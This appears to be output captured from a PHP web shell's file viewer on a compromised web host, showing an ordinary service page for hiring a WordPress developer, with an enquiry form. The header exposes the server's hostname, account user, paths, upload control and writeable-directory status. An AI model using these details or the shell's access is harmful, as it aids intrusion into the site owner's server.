KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache
System : Linux p3plzcpnl507073.prod.phx3.secureserver.net 4.18.0-553.53.1.lve.el8.x86_64 #1 SMP Wed May 28 17:01:02 UTC 2025 x86_64
User : swg98tjyzel1 ( 5098476)
PHP Version : 8.1.34
Disable Function : NONE
Directory :  /home/swg98tjyzel1/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/swg98tjyzel1/public_html/hire-wordpress-developer.php
<?php include("include/header.php"); ?>
	<style>
		.form-control{
			padding: 10px 20px;
			font-size: 13px;
			border: 1px solid #eee;
			background: transparent;
			outline: 0;
			color: #535353;
			height: 40px;
			border-radius: 3px;
		}
	</style>

	<div class="sub-banner overview-bgi">
		<div class="container">
			<div class="breadcrumb-area">
				<h1>WordPress Developer</h1>
				<ul class="breadcrumbs">
					<li><a href="index.html">Home</a></li>
					<li class="active">WordPress Developer</li>
				</ul>
			</div>
		</div>
	</div>

	<div class="project-details-page content-area-2">
		<div class="container">
			<div class="row">
				<div class="col-lg-8">
					<div id="ProjectDetailsSlider" class="carousel Project-details-sliders slide mb-60">
						<div class="carousel-inner">
							<div class="active item carousel-item" data-slide-number="0">
								<img src="assets/img/blog/blog-14.png" class="img-fluid" alt="blog-2">
							</div>
							<div class="item carousel-item" data-slide-number="1">
								<img src="assets/img/blog/blog-15.jpg" class="img-fluid" alt="blog-3">
							</div>
							<div class="item carousel-item" data-slide-number="2">
								<img src="assets/img/blog/blog-16.png" class="img-fluid" alt="blog-0">
							</div>
							<div class="item carousel-item" data-slide-number="4">
								<img src="assets/img/blog/blog-17.png" class="img-fluid" alt="blog-2">
							</div>
							<div class="item carousel-item" data-slide-number="5">
								<img src="assets/img/blog/blog-18.jpg" class="img-fluid" alt="blog-3">
							</div>

							<a class="carousel-control left" href="#ProjectDetailsSlider" data-slide="prev"><i class="fa fa-angle-left"></i></a>
							<a class="carousel-control right" href="#ProjectDetailsSlider" data-slide="next"><i class="fa fa-angle-right"></i></a>

						</div>
						<ul class="carousel-indicators smail-properties list-inline nav nav-justified ">
							<li class="list-inline-item active">
								<a id="carousel-selector-0" class="selected" data-slide-to="0" data-target="#ProjectDetailsSlider">
									<img src="assets/img/blog/blog-14.png" class="img-fluid" alt="blog-3">
								</a>
							</li>
							<li class="list-inline-item">
								<a id="carousel-selector-1" data-slide-to="1" data-target="#ProjectDetailsSlider">
									<img src="assets/img/blog/blog-15.jpg" class="img-fluid" alt="blog-2">
								</a>
							</li>
							<li class="list-inline-item">
								<a id="carousel-selector-2" data-slide-to="2" data-target="#ProjectDetailsSlider">
									<img src="assets/img/blog/blog-16.png" class="img-fluid" alt="blog">
								</a>
							</li>
							<li class="list-inline-item">
								<a id="carousel-selector-3" data-slide-to="3" data-target="#ProjectDetailsSlider">
									<img src="assets/img/blog/blog-17.png" class="img-fluid" alt="blog-3">
								</a>
							</li>
							<li class="list-inline-item">
								<a id="carousel-selector-4" data-slide-to="4" data-target="#ProjectDetailsSlider">
									<img src="assets/img/blog/blog-18.jpg" class="img-fluid" alt="blog-2">
								</a>
							</li>
						</ul>
					</div>
				</div>
				<div class="col-lg-4">
                    <div class="cart-total-box">
                        <h3>Enquiry Now</h3>
                        <hr>
                        <form action="#" method="post" enctype="multipart/form-data">
                            <input type="hidden" class="form-control" name="services_for" id="services_for" value="Hire Wordpress Developer">
							<div class="form-group">
								<input type="text" class="form-control" name="name" id="name" placeholder="Enter Your Name" required>
							</div>
							<div class="form-group">
								<input type="text" class="form-control" name="company_name" id="company_name" placeholder="Company/Website Name">
							</div>
							<div class="form-group">
								<input type="text" class="form-control" name="phone_no" id="phone_no" placeholder="Enter Your Phone No">
							</div>
							<div class="form-group">
								<input type="text" class="form-control" name="email" id="email" placeholder="Enter Your Email">
							</div>
							<div class="form-group">
								<select id="services" class="form-control" name="services">
									<option value="">Select Services</option>
										<option value="Website Design">Website Design</option>
										<option value="Website Development">Website Development</option>
										<option value="Software Development">Software Development</option>
										<option value="E-Commerce Website">E-Commerce Website</option>
										<option value="SEO">SEO</option>
										<option value="SMO">SMO</option>
										<option value="Mobile App">Mobile App</option>
									</optgroup>
								</select>
							</div>
							<div class="form-group">
								<select id="buget" class="form-control" name="buget">
									<option value="">Select Buget</option>
										<option value="$100-$200">$100-$200</option>
										<option value="$200-$400">$200-$400</option>
										<option value="$400-$600">$400-$600</option>
										<option value="$600-$800">$600-$800</option>
										<option value="$800-$1000">$800-$1000</option>
										<option value="$1000 and Above">$1000 and Above</option>
									</optgroup>
								</select>
							</div>
							<div class="form-group message">
								<textarea type="text" class="form-control" id="message" name="message" placeholder="Enter Your Message" col="8"></textarea>
							</div>
						</form>
                        <br>
                        <button class="btn btn-color btn-block btn-md" onClick="enquiry_now()" type="submit">Submit</button>
                    </div>
				</div>
			</div>
			<div class="row">
				<div class="col-lg-8 col-md-12">
					<div class="project-specification-2 d-lg-none d-xl-none mb-60 h-p-none">
						<h5 class="sidebar-title">How Iflexinfosolution Works For You?</h5>
							<ul>
								<li>
									<i class="flaticon-arrow"></i> <strong>Easy and fast to deploy</strong> fast to deploy
								</li>
								<li>
									<i class="flaticon-arrow"></i> <strong>Seamlessly integrates </strong> with your brand image
								</li>
								<li>
									<i class="flaticon-arrow"></i> <strong>Increases revenue and </strong> conversion rate
								</li>
								<li>
									<i class="flaticon-arrow"></i> <strong>Stable with quick </strong> solutions and bug fixation.
								</li>
								<li>
									<i class="flaticon-arrow"></i><strong>Open source with a </strong>large community
								</li>
								
							</ul>
					<p>We have a brilliant track record with a large number of successful projects to our credit. View our portfolio or get in touch with us to know more.</p>
					</div>
					<div class="product-description">
						<div class="main-title">
							<h1 style="font-size: 20px;"><span>Advantages of Hiring </span> a Dedicated WORDPRESS Developer Expert</h1>
						</div>
						<p> <i class="fa fa-check-circle-o" style="color: #0dcdbd;"></i>&nbsp; <b>WordPress Services</b> - IFLEXINFOSOLUTION offers all possible wordpress services ranging from custom wordpress theme development , plugin customization, wordpress speed optimization, SEO, and integration with 3rd party modules and application like facebook app or for creating Facebook Apps for your WordPress website.</p>
<p> <i class="fa fa-check-circle-o" style="color: #0dcdbd;"></i>&nbsp; <b>WordPress SEO</b> - We follow the best practices as per the latest strategy to advance your site for web indexes. We work for bringing up the site to its higher ranking through on-page and off-page SEO. </p>
<p><i class="fa fa-check-circle-o" style="color: #0dcdbd;"></i> &nbsp;<b>WordPress Support</b> - We offer quality WordPress support services. Our services include customization of website design, plugins, updates, migration, staging, maintenance and trouble shooting. You may hire us for all services. </p>
<p><i class="fa fa-check-circle-o" style="color: #0dcdbd;"></i>&nbsp; <b>WordPress Design</b>- Design remains our foremost focus. And if you are looking for custom design then you are at right place. We offer WordPress full service that includes a simple blog, brochure, static website to an advanced e-Commerce solution.</p>
<p><i class="fa fa-check-circle-o" style="color: #0dcdbd;"></i> &nbsp;<b>WordPress Customization</b> - WordPress customization is done according to our client requirements. Our developers does it like a piece of art and seamlessly integrates third party plugin and module to your site suitably and perfectionally.</p>
<p><i class="fa fa-check-circle-o" style="color: #0dcdbd;"></i> &nbsp; <b>WordPress Module Development</b> - We create sites where content flows in from WordPress and Products get seamlessly integrated from the Magento Store giving your website a great mix of technologies.</p>
<p><i class="fa fa-check-circle-o" style="color: #0dcdbd;"></i> &nbsp; <b>WordPress Upgradation Service</b>- A site without security is life without breath for us. So we understand its importance and we provide high user-end security levels in your site. From maintaning site free from virus atack Hire us for all wordpress and plugin upgradation.</p>
<p><i class="fa fa-check-circle-o" style="color: #0dcdbd;"></i> &nbsp;<b>WordPress Maintenance and Support</b> - We do understand not our all clients are technical sound to maintain his site and store single handedly n neither do all clients have time to update and maintain them.</p>
					</div>
				</div>
				<div class="col-lg-4 col-md-12 d-none d-xl-block d-lg-block">
					<div class="sidebar">
						<div class="project-specification-2 widget">
							<h5 class="sidebar-title">How Iflexinfosolution Works For You?</h5>
							<ul>
								<li>
									<i class="flaticon-arrow"></i> <strong>Easy and fast to deploy</strong> fast to deploy
								</li>
								<li>
									<i class="flaticon-arrow"></i> <strong>Seamlessly integrates </strong> with your brand image
								</li>
								<li>
									<i class="flaticon-arrow"></i> <strong>Increases revenue and </strong> conversion rate
								</li>
								<li>
									<i class="flaticon-arrow"></i> <strong>Stable with quick </strong> solutions and bug fixation.
								</li>
								<li>
									<i class="flaticon-arrow"></i><strong>Open source with a </strong>large community
								</li>
								
							</ul>
					<p>We have a brilliant track record with a large number of successful projects to our credit. View our portfolio or get in touch with us to know more.</p>
						</div>
					</div>
				</div>
			</div>
		</div>
	</div>
<?php include("include/footer.php"); ?>
<script>
	function enquiry_now(){
		var name=$('#name').val();
		if(name==''){
			$('#name').focus();
			$('#name').css('border-color','red');
			return false;
		}
		var company_name=$('#company_name').val();
		if(company_name==''){
			$('#company_name').focus();
			$('#company_name').css('border-color','red');
			return false;
		}
		var phone_no=$('#phone_no').val();
		if(phone_no==''){
			$('#phone_no').focus();
			$('#phone_no').css('border-color','red');
			return false;
		}
		var email=$('#email').val();
		if(email!=''){
			var filter = /^([\w-\.]+)@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.)|(([\w-]+\.)+))([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/;
			if (filter.test(email)){

			}else{

				$('#email').focus();
				$('#email').css('border-color','red');
				$('#email').val('');
				$('#email').attr("placeholder", "Enter a valid Email");
				return false;
			}
		}else{
			$('#email').focus();
			$('#email').css('border-color','red');
			return false;
		}
		var services=$('#services').val();
		if(services==''){
			$('#services').focus();
			$('#services').css('border-color','red');
			return false;
		}
		var buget=$('#buget').val();
		if(buget==''){
			$('#buget').focus();
			$('#buget').css('border-color','red');
			return false;
		}
		var message=$('#message').val();
		var services_for=$('#services_for').val();
		$.ajax({
			type: "POST",
			data: {name:name,company_name:company_name,phone_no:phone_no,email:email,services:services,buget:buget,message:message,services_for:services_for},
			url: "ajax-enquiry.php",
			success: function(data){
				if(data=='yes'){
					alert('Thanks For Your Inquiry.We Will Contact You Soon..');
				}else{
					alert('Data Update Failed..')
				}
				setTimeout(function() { location.reload(); }, 1000);
			}

		});
	}
</script>

TitusBoTz-MD - 2021